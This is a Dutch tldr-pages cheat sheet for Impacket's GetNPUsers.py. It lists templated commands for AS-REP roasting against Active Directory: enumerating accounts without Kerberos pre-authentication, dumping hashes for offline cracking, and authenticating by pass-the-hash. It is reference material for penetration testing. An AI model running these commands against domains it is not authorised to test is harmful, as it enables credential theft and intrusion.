tldr/pages.nl/common/getnpusers.py.md

GetNPUsers.py

Ga over alle Active Directory accounts met Kerberos pre-authentication uitgeschakeld, die vatbaar kunnen zijn voor AS-REP roasing aanvallen. Onderdeel van de Impacket suite. Meer informatie: https://github.com/fortra/impacket.

• Ga over alle gebruikers met Kerberos pre-authentication uitgeschakeld (standaard anonieme enumeration):

GetNPUsers.py {{domein}}/ -usersfile {{pad/naar/gebruikerslijst}} -dc-ip {{domain_controller_ip}}

• Voer AS-REP roasting uit en dump kraakbare hashes voor offline kraking:

GetNPUsers.py {{domein}}/ -usersfile {{pad/naar/gebruikerslijst}} -dc-ip {{domain_controller_ip}} -request

• Authenticeer met valide credentials (als anonieme binding is uitgeschakeld):

GetNPUsers.py {{domein}}/{{username}}:{{password}} -usersfile {{pad/naar/gebruikerslijst}} -dc-ip {{domain_controller_ip}}

• Gebruik pass-the-hash authenticatie in plaats van een wachtwoord:

GetNPUsers.py {{domein}}/{{username}} -hashes {{LM_Hash}}:{{NT_Hash}} -usersfile {{pad/naar/gebruikerslijst}} -dc-ip {{domain_controller_ip}}

• Sla de output op in een bestand:

GetNPUsers.py {{domein}}/ -usersfile {{pad/naar/gebruikerslijst}} -dc-ip {{domain_controller_ip}} -request > {{pad/naar/output.txt}}